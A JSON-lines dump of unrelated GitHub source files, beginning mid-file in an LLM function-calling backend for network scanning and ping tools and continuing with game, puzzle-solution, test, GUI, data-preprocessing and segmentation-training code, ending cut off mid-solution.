\"required\": []\n }\n }\n signature_capture_packets = {\n \"name\": \"capture_packets\",\n \"description\": \"Capture network packets for and aggregate them\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"duration\": {\n \"type\": \"integer\",\n \"description\": \"Duration in seconds for which to capture packets\",\n \"default\": 5\n }\n },\n \"required\": []\n }\n }\n\n signature_ping = {\n \"name\": \"ping_host\",\n \"description\": \"Ping a specified host to check its reachability\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"host\": {\n \"type\": \"string\",\n \"description\": \"The host to ping\"\n },\n \"count\": {\n \"type\": \"integer\",\n \"description\": \"Number of echo requests to send\",\n \"default\": 4\n }\n },\n \"required\": [\"host\"]\n }\n }\n signature_get_ip = {\n \"name\": \"get_ip_address\",\n \"description\": \"Get my own IP address\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {},\n \"required\": []\n }\n }\n try:\n logging.info('Calling GPT API...')\n res = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n functions=[signature_network_scan, signature_capture_packets, signature_ping, signature_get_ip],\n function_call=function_call\n )\n return res\n except Exception as e:\n raise HTTPException(status_code=500, detail=str(e))\n\ndef estimate_token_count(message):\n words = message.split()\n return len(words) * 4\n\ndef limit_context_to_max_tokens(messages, max_tokens=10000):\n limited_messages = []\n total_tokens = 0\n for message in reversed(messages):\n msg_token_count = estimate_token_count(message[\"content\"])\n if total_tokens + msg_token_count <= max_tokens:\n total_tokens += msg_token_count\n limited_messages.append(message)\n else:\n break\n return list(reversed(limited_messages))\n\ndef log_streamer():\n with open('logs.log', 'r') as f:\n f.seek(0, 2)\n while True:\n line = f.readline()\n if not line:\n sleep(0.1)\n continue\n yield f\"data: {line}\\n\\n\"\n\nclass Message(BaseModel):\n message: list\n model: str\n\nasync def networkgpt(message_data: Message):\n message = message_data.message\n model = message_data.model\n messages = limit_context_to_max_tokens(message)\n llm_system_prompt = \"\"\"You are Network GPT, a virtual assistant with the capability to process text requests and perform specific network functions. \nIf the last user message explicitly requests a network scan, invoke the 'network_scan' function to initiate the scan.\nIf the last user message explicitly requests to capture their packets, invoke the 'capture_packets' function to initiate the capturing.\nIf the last user message explicitly requests to ping, invoke the 'ping_host' function to ping a host.\nIf the last user message explicitly requests their own IP address, invoke the 'get_ip_address' function to get their IP.\nOtherwise, respond with appropriate information or guidance based on the user's request.\"\"\"\n messages.insert(0, {\"role\": \"system\", \"content\": llm_system_prompt})\n res = chat_with_openai(messages, model)\n response = res[\"choices\"][0][\"message\"]\n if response.get(\"function_call\"):\n function_name = response[\"function_call\"][\"name\"]\n function_results = {}\n args = json.loads(response[\"function_call\"][\"arguments\"])\n if function_name == \"network_scan\":\n if args.get(\"own_network\"):\n hosts = get_own_subnet()\n else:\n hosts = args.get(\"hosts\", get_own_subnet())\n scan_results = network_scan(\n hosts=hosts,\n arguments=args.get(\"arguments\", \"\")\n )\n function_results['scan'] = scan_results\n if function_name == \"capture_packets\":\n logging.info(f\"Capturing packets for {args.get('duration', 5)} seconds\")\n packet_results = capture_packets(duration=args.get(\"duration\", 5))\n function_results['packet_results'] = packet_results\n if function_name == \"ping_host\":\n logging.info(f\"Sending {args.get('count')} requests to {args.get('host')}\")\n ping_results = ping_host(host=args.get(\"host\"), count=args.get(\"count\", 4))\n function_results['ping_results'] = ping_results\n if function_name == \"get_ip_address\":\n ip_results = get_ip_address()\n function_results['my_ip'] = ip_results\n return {\"response\": json.dumps(function_results)}\n else:\n return {\"response\": res[\"choices\"][0][\"message\"][\"content\"]}\n\nasync def stream_logs():\n logging.info('Streaming logs')\n return StreamingResponse(log_streamer(), media_type=\"text/event-stream\")","repo_name":"k4l1sh/network-gpt","sub_path":"backend/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"16733577292","text":"import pygame\nfrom random import randint\nclass Asteroide(pygame.sprite.Sprite):\n\tvelocidad = 5\n\tdef __init__(self,posx,posy):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.listaimagenes = []\n\t\tself.vida = True\n\t\tfor each in ['./Imagenes/Asteroides/ASTEROID%s.PNG'%x for x in range(0,5)]:\n\t\t\tif each != None:\n\t\t\t\tself.listaimagenes.append(pygame.image.load(each).convert())\n\t\tself.rand = randint(0,3)\n\t\tself.rect = self.listaimagenes[self.rand].get_rect()\n\t\tself.rect.left = posx\n\t\tself.rect.top = posy\n\n\tdef dibujar(self,superficie):\n\t\tsuperficie.blit(self.listaimagenes[self.rand],(self.rect.left,self.rect.top))","repo_name":"Sturm0/Pygame-Space-Invaders-Amenaza-Espacial","sub_path":"Asteroide.py","file_name":"Asteroide.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16063813164","text":"'''Lv.2 다음 큰 숫자'''\r\n\r\n# 문제 : https://school.programmers.co.kr/learn/courses/30/lessons/12911\r\n\r\n\r\n# 풀이 1\r\ndef solution(n):\r\n n1_1 = bin(n)[2:].count('1')\r\n \r\n while(True):\r\n n += 1\r\n n2_1 = bin(n)[2:].count('1')\r\n if n1_1 == n2_1: return n","repo_name":"Taeho25/Algorithm","sub_path":"Programmers/Lv.2/다음 큰 숫자.py","file_name":"다음 큰 숫자.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"20762581355","text":"'''\nProblem ID:\nPE0006\n\nProblem Title:\nSum square difference\n\nProblem Description:\nThe sum of the squares of the first ten natural numbers is,\n1**2+2**2+...+10**2=385\nThe square of the sum of the first ten natural numbers is,\n(1+2+...+10)**10=3025\nHence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is .\n3025-385=2640\nFind the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.\n\nProblem Solution:\n25164150\n'''\n\ndef solution(max):\n result = 0\n a = 0\n for number in range(1,1+max):\n result -= number**2\n a += number\n result += a**2\n return result\n\nprint(solution(100))","repo_name":"villocan/project-euler-solutions","sub_path":"Problem_0006.py","file_name":"Problem_0006.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17828469155","text":"from odp.api.core.wrappers import OpenDotaClient\nimport requests_mock\n\nURL = 'https://api.opendota.com/api/teams/'\ntest_team_data = {\n \"team_id\": 1234,\n \"rating\": 1.2,\n \"wins\": 1,\n \"losses\": 1,\n \"last_match_time\": 1111,\n \"name\": \"TestTeam\",\n \"tag\": \"TT\",\n \"logo_url\": \"https://fake.png\"\n}\n\n\ndef test_get_team():\n client = OpenDotaClient()\n with requests_mock.mock() as mock:\n mock.get(URL, json=[test_team_data])\n res = client.get_team_by_name('TestTeam')\n assert len(res) == 8\n assert res['team_id'] == 1234\n\n\ndef test_get_fake_team():\n client = OpenDotaClient()\n with requests_mock.mock() as mock:\n mock.get(URL, json=[test_team_data])\n res = client.get_team_by_name('FakeTestTeam')\n assert res is None\n","repo_name":"MaksymMartyniak/OpenDotaProject","sub_path":"tests/test_get_team_wrapper.py","file_name":"test_get_team_wrapper.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27368126588","text":"print(f'Hello from {__file__}')\n\nimport pandas as pd\nimport numpy as np\nimport os\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import OneHotEncoder\n\nX = pd.read_csv('./data/raw/train/Train.csv', delimiter=',')\ny = pd.read_csv('./data/raw/train/Target.csv', delimiter=',')\nX_kaggle = pd.read_csv('./data/raw/test/Test.csv', delimiter=',')\nX_full = pd.concat([X, X_kaggle], sort=False, axis=0)\n\ncat_columns = ['code', 'period', 'id', 'Country']\nnum_columns = ['year', 'tourists', 'venue', 'rate', 'food',\n 'glass', 'metal', 'other', 'paper', 'plastic',\n 'leather', 'green_waste', 'waste_recycling']\n\nX_full_num = X_full[num_columns].copy()\nX_full_cat = X_full[cat_columns].copy()\n\nscaler = MinMaxScaler().fit(X_full_num)\nX_full_num_tr = scaler.transform(X_full_num)\nX_full_num_tr = pd.DataFrame(X_full_num_tr, columns=num_columns)\n\nonehot = OneHotEncoder().fit(X_full_cat)\nX_full_cat_tr = onehot.transform(X_full_cat).toarray()\nX_full_cat_tr = pd.DataFrame(X_full_cat_tr)\n\nX_full_tr = pd.concat([X_full_num_tr, X_full_cat_tr], sort=False, axis=1)\n\nX_tr = X_full_tr.iloc[:X.shape[0],:]\nX_kaggle_tr = X_full_tr.iloc[X.shape[0]:,:]\n\n\nX_train, X_test, y_train, y_test = train_test_split(\n X_tr, y['polution_clf'], test_size=0.01, random_state=42)\n\n\npath = './data/processed/'\nif not os.path.exists(path):\n os.mkdir(path)\n\nX_train.to_csv('./data/processed/X_train.csv')\nX_test.to_csv('./data/processed/X_test.csv')\ny_train.to_csv('./data/processed/y_train.csv')\ny_test.to_csv('./data/processed/y_test.csv')\nX_kaggle_tr.to_csv('./data/processed/X_for_kaggle.csv')\n","repo_name":"moriys/mlops_task1_pipeline","sub_path":"model_preprocessing.py","file_name":"model_preprocessing.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17960766045","text":"# Ryan Blakeman\n# CST 205\n# Project1.pys\n# github.com/rblakeman/CST205-Project1\n\nfrom PIL import Image, ImageFilter\n\ndef medianOdd(myList):\n listLength = len(myList)\n sortedValues = sorted(myList)\n middleIndex = (int)((listLength + 1)/2) - 1\n return sortedValues[middleIndex]\n\n\ntheImages = list()\n\nredPixelList = list()\ngreenPixelList = list()\nbluePixelList = list()\n\ntry:\n for i in range(1,9):\n theImages.append(Image.open(str(i)+\".png\"))\nexcept:\n print (\"Failed to load\")\n\nnewImage = Image.new(\"RGB\", theImages[1].size, (255,255,255))\nnewImagedata = newImage.load()\n\nprint (\"The size of the images are: \")\nprint (theImages)\n\npictureWidth = theImages[1].size[0]\npictureHeight = theImages[1].size[1]\n\nfor x in range(0,pictureWidth):\n for y in range(0, pictureHeight):\n for myImage in theImages:\n myRed, myGreen, myBlue = myImage.getpixel((x,y))[:3]\n # [:3] for transparancy channel\n redPixelList.append(myRed)\n greenPixelList.append(myGreen)\n bluePixelList.append(myBlue)\n\n newred = medianOdd(redPixelList)\n newgreen = medianOdd(greenPixelList)\n newblue = medianOdd(bluePixelList)\n\n newImagedata[x,y] = (newred, newgreen, newblue)\n\n redPixelList.clear()\n greenPixelList.clear()\n bluePixelList.clear()\n\nnewImage.save(\"new.png\")\n","repo_name":"rblakeman/CST205-Project1","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33917246316","text":"r\"\"\"\nGiven a List of words, return the words that can be typed using letters of alphabet on only \none row's of American keyboard like the image below.\n\nhttps://assets.leetcode.com/uploads/2018/10/12/keyboard.png\n \nExample:\n\n Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]\n Output: [\"Alaska\", \"Dad\"]\n\nNote:\n You may use one character in the keyboard more than once.\n You may assume the input string will only contain letters of alphabet.\n\"\"\"\n\n\nclass Solution:\n def findWords1(self, words):\n d = {\n 'q': 1, 'w': 1, 'e': 1, 'r': 1, 't': 1, 'y': 1, 'u': 1, 'i': 1, 'o': 1, 'p': 1, \n 'a': 2, 's': 2, 'd':2, 'f': 2, 'g': 2, 'h': 2, 'j': 2, 'k': 2, 'l': 2, \n 'z': 3, 'x': 3, 'c': 3, 'v': 3, 'b': 3, 'n': 3, 'm': 3\n }\n\n res = []\n for s in words:\n letters = set(s.lower())\n row = d[letters.pop()]\n flag = True\n for letter in letters:\n if d[letter] != row:\n flag = False\n break\n \n if flag:\n res.append(s)\n \n return res\n\n def findWords2(self, words):\n row1 = set('qwertyuiop')\n row2 = set('asdfghjkl')\n row3 = set('zxcvbnm')\n res = []\n for s in words:\n tmp = set(s.lower())\n if not ((tmp - row1) and (tmp - row2) and (tmp - row3)):\n res.append(s)\n \n return res\n","repo_name":"chaosWsF/Python-Practice","sub_path":"leetcode/0500_keyboard_row.py","file_name":"0500_keyboard_row.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7030026511","text":"\"\"\"empty message\n\nRevision ID: ed60bf4996df\nRevises: 41c26af3cd58\nCreate Date: 2020-11-18 20:03:09.497973\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ed60bf4996df'\ndown_revision = '41c26af3cd58'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(None, 'group', 'user', ['group_admin'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'group', type_='foreignkey')\n # ### end Alembic commands ###\n","repo_name":"SamuelJMiller/group-scheduler","sub_path":"migrations/versions/ed60bf4996df_.py","file_name":"ed60bf4996df_.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41525720186","text":"from kivymd.uix.card import MDCard\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDFillRoundFlatIconButton,MDRoundFlatIconButton\nfrom kivymd.uix.snackbar import Snackbar\nfrom kivy.clock import Clock\nfrom pydantic import ValidationError\n\nfrom modules.moduleDetailsArticle.detailsArticle import DetailsArticleScreen\n\n\nfrom common.entities.article_entity import ArticleEntity\nfrom common.database.firebase import articles\nfrom common.values import strings\n\nclass InventoryMDCard(MDCard):\n listArticle: articles = articles\n def __init__(self, **kw) -> None:\n super(InventoryMDCard,self).__init__(**kw)\n Clock.schedule_once(lambda *kargs:self.getArticles())\n \n def addItemRecycleView(self,article:ArticleEntity):\n self.ids.recycle_view_articles.data.append({\n \"listener\":self,\n \"article\":article,\n \"codeBar\":article.id,\n \"photoUrl\":article.photoUrl,\n \"name\":article.name,\n \"amount\":article.amount.__str__(),\n \"price\":article.price.__str__()\n }\n )\n def getArticles(self):\n self.ids.recycle_view_articles.data = []\n self.listArticle = articles.getAllArticles()\n \n for article in self.listArticle:\n self.addItemRecycleView(article)\n \n \n def filterArticles(self):\n self.ids.recycle_view_articles.data = []\n codeBar = self.ids.text_field_code_bar.text.__str__()\n if codeBar.__len__() > 0:\n for article in articles.getAllArticles():\n if codeBar in article.id or codeBar in article.name:\n self.addItemRecycleView(article) \n else:\n self.getArticles()\n \n\n def addArticle(self):\n detailsArticle = DetailsArticleScreen()\n self.dialog = MDDialog(\n title = strings.title_create_article,\n type = \"custom\",\n content_cls = detailsArticle,\n buttons = [\n MDRoundFlatIconButton(\n icon = \"exit-run\",\n text = \"Cancelar\",\n on_press = self.dialogClose\n ),\n MDFillRoundFlatIconButton(\n icon = \"content-save-all\",\n text = \"Guardar\",\n on_press = self.validateArticle\n )\n ]\n )\n self.dialog.open()\n \n\n def dialogClose(self, *args):\n self.dialog.dismiss(force=True)\n\n def validateArticle(self,*args):\n try:\n articleEntity = ArticleEntity(\n id = self.dialog.content_cls.ids.text_field_code_bar.text,\n name = self.dialog.content_cls.ids.text_field_name.text,\n description = self.dialog.content_cls.ids.text_field_description.text,\n photoUrl = self.dialog.content_cls.ids.text_field_photo_url.text,\n price = float (self.dialog.content_cls.ids.text_field_price.text),\n amount = float(self.dialog.content_cls.ids.text_field_amount.text),\n offSale = float(self.dialog.content_cls.ids.text_field_off_sale.text),\n shelf = self.dialog.content_cls.ids.text_field_shelf.text,\n vertical = self.dialog.content_cls.ids.text_field_vertical.text,\n horizontal = self.dialog.content_cls.ids.text_field_horizontal.text,\n category = self.dialog.content_cls.ids.drop_down_item_category.text\n )\n if self.dialog.content_cls.isEdit == True:\n self.updateArticleInventory(articleEntity)\n self.getArticles()\n else:\n if articles.existsArticle(articleEntity.id):\n dialog = MDDialog(title = strings.msg_error,text = strings.msg_article_exists)\n dialog.open()\n else:\n articles.saveArticle(articleEntity)\n self.getArticles()\n Snackbar(text=strings.msg_save_success_article).open()\n self.dialogClose()\n\n except ValidationError as error:\n dialog = MDDialog(title = strings.msg_error,text = error.errors.__str__())\n dialog.open()\n \n\n\n\n\n\n ####################\n ## InventoryAux\n ####################\n def deleteArticleInventory(self,article:ArticleEntity):\n print(\"delete article firebase\", article.id)\n if articles.deleteArticle(article):\n Snackbar(text=strings.msg_success_delete_article).open()\n self.getArticles()\n else:\n Snackbar(text=strings.msg_error_delete_article).open()\n\n def updateArticleInventory(self,article:ArticleEntity):\n if articles.updateArticle(article):\n Snackbar(text=strings.msg_success_update_article).open()\n else:\n Snackbar(text=strings.msg_error_delete_article).open()\n \n def openEditArticle(self,article:ArticleEntity):\n detailsArticle = DetailsArticleScreen(article)\n self.dialog = MDDialog(\n title = strings.title_edit_article,\n type = \"custom\",\n content_cls = detailsArticle,\n buttons = [\n MDRoundFlatIconButton(\n icon = \"exit-run\",\n text = \"Cancelar\",\n on_press = self.dialogClose\n ),\n MDFillRoundFlatIconButton(\n icon = \"content-save-all\",\n text = \"Guardar\",\n on_press = self.validateArticle\n )\n ]\n )\n self.dialog.open()","repo_name":"saulkali/POSKivy","sub_path":"modules/moduleInventory/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23142757981","text":"import pytest\nfrom faust.cli.completion import completion\nfrom mode.utils.mocks import patch\n\n\nclass test_completion:\n\n @pytest.fixture()\n def command(self, *, context):\n return completion(context)\n\n @pytest.mark.asyncio\n async def test_run(self, *, command):\n with patch('faust.cli.completion.click_completion') as cc:\n await command.run()\n cc.get_code.assert_called_once_with(shell=command.shell())\n\n @pytest.mark.asyncio\n async def test_run__no_completion(self, *, command):\n with patch('faust.cli.completion.click_completion', None):\n with pytest.raises(command.UsageError):\n await command.run()\n","repo_name":"robinhood/faust","sub_path":"t/unit/cli/test_completion.py","file_name":"test_completion.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":6634,"dataset":"github-code","pt":"76"} +{"seq_id":"27308083","text":"from PyQt5.QtCore import QSortFilterProxyModel\nfrom PyQt5.QtWidgets import QDockWidget, QHeaderView, QLabel\n\nfrom app.mainwindow.queuetablemodel import QueueTableModel\nfrom app.parser import outputparser\nfrom app.ui.ui_queue import Ui_QueueDock\nfrom app.uiutils import (\n get_max_text_width, TABLE_WIDTH_PADDING, TABLE_HEIGHT_PADDING\n)\n\n\nclass QueueDock(QDockWidget, Ui_QueueDock):\n CONFIG_QUEUE_FILTER_STATE_KEY = 'mainWindow/queue/filterCheckState'\n\n def __init__(self, parent, sender):\n \"\"\"Constructor\n\n :param QWidget parent: parent of the QueueDock\n :param app.sender.QtSender sender: QtSender instance\n \"\"\"\n super().__init__(parent)\n self._sender = sender\n self.setupUi(self)\n self._init_table()\n sender.queue_paused.connect(self.on_paused)\n\n def _init_table(self):\n source_model = QueueTableModel(self._sender, self)\n model = QSortFilterProxyModel(self)\n model.setSourceModel(source_model)\n model.setFilterKeyColumn(1) # module column\n self.table.setModel(model)\n\n self.table.horizontalHeader().setSectionResizeMode(\n QHeaderView.Fixed)\n # Resize columns basing on maximum contents widths\n fm = self.table.fontMetrics()\n # We don't expect the number of requests to exceed 1M\n self.table.horizontalHeader().resizeSection(\n 0, fm.width('000000') + TABLE_WIDTH_PADDING)\n self.table.horizontalHeader().resizeSection(1, get_max_text_width(\n fm, self.get_known_queue_modules()) + TABLE_WIDTH_PADDING)\n # Row height\n self.table.verticalHeader().setDefaultSectionSize(\n fm.height() + TABLE_HEIGHT_PADDING)\n\n @staticmethod\n def get_known_queue_modules():\n \"\"\"Get names of all app modules that sends requests via Sender\"\"\"\n return ([cls.__name__ for cls in outputparser.PARSERS] +\n ['Analyzer', 'GSInfoDialog', 'VideoIDDialog', 'MissionStatus'])\n\n def create_statusbar_widget(self):\n \"\"\"Create label for status bar showing number of requests processed\n\n :return: label widget\n :rtype: QLabel\n \"\"\"\n queue_status_label = QLabel()\n queue_model = self.table.model().sourceModel()\n\n def update_text():\n \"\"\"Update \"Processing ... requests\" label text on status bar\"\"\"\n count = queue_model.rowCount()\n queue_status_label.setText(\"Processing {} requests\"\n .format(count))\n\n update_text()\n queue_model.rowsInserted.connect(update_text)\n queue_model.rowsRemoved.connect(update_text)\n return queue_status_label\n\n def on_paused(self, paused):\n self.setWindowTitle('&Queue' + (' [paused]' if paused else ''))\n","repo_name":"KrakSat-2016/kraksat-receiver","sub_path":"app/mainwindow/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26411384912","text":"\"\"\" Iname duplication strategies to make kernels schedulable \"\"\"\nfrom loopy import (has_schedulable_iname_nesting,\n get_iname_duplication_options,\n duplicate_inames,\n )\n\n\ndef heuristic_duplication(kernel):\n # If the given kernel is schedulable, nothing needs to be done.\n if has_schedulable_iname_nesting(kernel):\n return kernel\n\n # List all duplication options and return the transformed\n # kernel if one such duplication transformation was enough to solve the problem.\n for iname, within in get_iname_duplication_options(kernel):\n dup_kernel = duplicate_inames(kernel, iname, within)\n if has_schedulable_iname_nesting(dup_kernel):\n return dup_kernel\n\n raise NotImplementedError(\"Your kernel needs multiple iname duplications! No generic algorithm implemented for that yet! (#39)\")\n","repo_name":"jiaqiwang969/dune-course-material","sub_path":"iwr-course-2021/dune/dune-codegen/python/dune/codegen/loopy/transformations/duplicate.py","file_name":"duplicate.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23281330636","text":"from models import UNet, FCN, FCN_ResNet50, FCN_VGG19\r\nfrom utils import entropy_loss, dice_loss\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport math\r\nimport time\r\nimport sys\r\n\r\n# python demo_U-net.py fcn/unet cross_entropy/dice_loss\r\nmodel_name = sys.argv[1]\r\nprint('Get model name: ', model_name)\r\nprint('Get loss function: ', sys.argv[2])\r\nif len(sys.argv)>2 and sys.argv[2]=='cross_entropy':\r\n loss_function = entropy_loss\r\nelif len(sys.argv)>2 and sys.argv[2]=='dice_loss':\r\n loss_function = dice_loss\r\nelse:\r\n loss_function = entropy_loss\r\n\r\nx_train_path = './Dataset/sample_train_color/'\r\nt_train_path = './Dataset/sample_train_label/'\r\nx_train_name = os.listdir(x_train_path)\r\nt_train_name = os.listdir(t_train_path)\r\nx_train_name = [x_train_path+s for s in x_train_name]\r\n#x_train_name = x_train_name[0:100]\r\nx_train_name.sort()\r\nt_train_name = [t_train_path+s for s in t_train_name]\r\n#t_train_name = t_train_name[0:100]\r\nt_train_name.sort()\r\n\r\n# parameters\r\nbatch_size = 32\r\nepoch = 10 \r\nLR = 5e-4\r\nimg_height = 90\r\nimg_width = 420\r\ndown_scale = 8\r\nclass_num = 2\r\ndata_size = len(x_train_name)\r\nn_batches = int(math.ceil(data_size/batch_size))\r\n\r\n\r\n# This cell is used to construct the pipeline of dataset\r\ndef _parse_function(x_name, t_name, img_shape, down_scale, class_num):\r\n x_string = tf.read_file(x_name)\r\n x = tf.image.decode_jpeg(x_string, channels=3)\r\n x = x[1560:2280, 7:-7]/1000\r\n x = tf.image.resize_images(x, img_shape)\r\n t_string = tf.read_file(t_name)\r\n t = tf.image.decode_png(t_string, channels=1, dtype=tf.uint16)\r\n t = t[1560:2280, 7:-7]\r\n t = t[::down_scale, ::down_scale]\r\n t = t[:, 1:-1]\r\n t = tf.cast(t/1000, tf.int32)\r\n \r\n shape = tf.shape(t)\r\n t = tf.reshape(t, (shape[0]*shape[1],))\r\n t = tf.one_hot(t, depth=41)\r\n t = tf.concat([t[:, 0:1], t[:, 33:34]], axis=1)\r\n t = tf.reshape(t, (shape[0], shape[1], class_num))\r\n \r\n return x, t\r\n\r\nx_filenames = tf.constant(x_train_name)\r\nt_filenames = tf.constant(t_train_name)\r\n\r\ndataset = tf.data.Dataset.from_tensor_slices((x_filenames, t_filenames))\r\ndataset = dataset.map(lambda x, y: _parse_function(x, y, (img_height, img_width), down_scale, class_num))\r\ndataset = dataset.shuffle(buffer_size=32).batch(batch_size).repeat(epoch+1)\r\niterator = dataset.make_initializable_iterator()\r\nnext_batch = iterator.get_next()\r\n\r\nx_batch, t_batch = next_batch # get the tf variable of input and target images\r\n\r\n\r\nif model_name.lower()=='unet' or model_name.lower=='u-net':\r\n segnet = UNet(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\nelif model_name.lower()=='fcn':\r\n segnet = FCN(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\nelif model_name.lower()=='resnet50' or model_name.lower()=='resnet':\r\n segnet = FCN_ResNet50(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\nelif model_name.lower()=='vgg19' or model_name.lower()=='vgg':\r\n segnet = FCN_VGG19(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\n\r\nsess = tf.Session()\r\nsess.run(tf.global_variables_initializer())\r\nsess.run(iterator.initializer)\r\n\r\n\r\nsaver = tf.train.Saver(max_to_keep=epoch)\r\nif not os.path.isdir('./Models'):\r\n os.mkdir('./Models')\r\n os.mkdir('./Models/'+model_name+'/')\r\nelif not os.path.isdir('./Models/'+model_name+'/'):\r\n os.mkdir('./Models/'+model_name+'/')\r\n\r\ntotal_loss = 0\r\nstart = time.time()\r\nfor _ in range(n_batches):\r\n loss = sess.run(segnet.loss)\r\n total_loss += loss\r\n end = time.time()\r\nmessage = 'Epoch: {:>2} | Loss: {:>10.8f} | Time: {:>6.1f}'\r\nprint(message.format(0, total_loss/n_batches, end-start))\r\n \r\nif os.path.isfile('./log'):\r\n os.remove('./log')\r\nwith open('./log', 'a') as file_write:\r\n file_write.write(model_name + ' ' + sys.argv[2] )\r\n file_write.write(message.format(0, total_loss/n_batches, end-start))\r\n file_write.write('\\n')\r\n\r\nfor ep in range(epoch):\r\n total_loss = 0\r\n start = time.time()\r\n for _ in range(n_batches):\r\n _, loss = sess.run([segnet.training, segnet.loss])\r\n total_loss += loss\r\n end = time.time()\r\n message = 'Epoch: {:>2} | Loss: {:>10.8f} | Time: {:>6.1f}'\r\n print(message.format(ep+1, total_loss/n_batches, end-start))\r\n \r\n if not os.path.isdir('./Models/'+model_name):\r\n os.mkdir('./Models/'+model_name)\r\n os.mkdir('./Models/'+model_name+'/'+model_name+'-'+str(ep))\r\n elif not os.path.isdir('./Models/'+model_name+'/'+model_name+'-'+str(ep)):\r\n os.mkdir('./Models/'+model_name+'/'+model_name+'-'+str(ep))\r\n save_path = saver.save(sess, \r\n './Models/'+model_name+'/'+model_name+'-'+str(ep)+'/'+model_name+'.ckpt')\r\n \r\n with open('./log', 'a') as file_write:\r\n file_write.write(message.format(ep+1, total_loss/n_batches, end-start))\r\n file_write.write('\\n')\r\n","repo_name":"rayush7/CVPR-2018-WAD-Video-Segmentation-Challenge","sub_path":"demo_U-net.py","file_name":"demo_U-net.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5326589254","text":"class Solution:\n def dp(self,A,i,j,dp):\n global ans\n if dp[i][j]:\n return dp[i][j]\n\n if i == 0 or j == 0:\n ans = 1\n else:\n ans = self.dp(A,i-1,j,dp) + self.dp(A,i,j-1,dp)\n dp[i][j] = ans\n return ans\n\n def Solve(self,m,n):\n dp = [[0]*n for _ in range(m)]\n self.dp(A,m-1,n-1,dp)\n return dp[-1][-1]\n\nif __name__ == '__main__':\n A = 3\n B = 2\n C = Solution()\n print(C.Solve(A,B))\n","repo_name":"srajsonu/LeetCode-Solutions-Python","sub_path":"Dynamic Programming/62. Unique Paths.py","file_name":"62. Unique Paths.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71230403766","text":"# 백준 #1796 신기한 키보드\n'''\n Algorithm: dp\n Time Complexity: -\n\n 알파벳 순서로 클릭.\n ex) 'e'의 최소 위치와 최대 위치 사이를 움직이면 모든 'e'를 클릭할 수 있다.\n\n dp[i][j] : 현재 커서가 i일때, j번째 알파벳을 모두 클릭하기 위해 필요한 최소 이동 횟수 \n'''\nimport sys\nfrom typing import List, Tuple, Callable\n\nINF = sys.maxsize\n\ndef input() -> Callable:\n return sys.stdin.readline().rstrip()\n\n\ndef read_data() -> Tuple:\n S = list(input())\n return S,\n\ndef ctoi(c:str) -> int:\n return ord(c) - ord('a')\n\ndef solution(S:List[str]) -> int:\n N = len(S)\n alp_info = [None for _ in 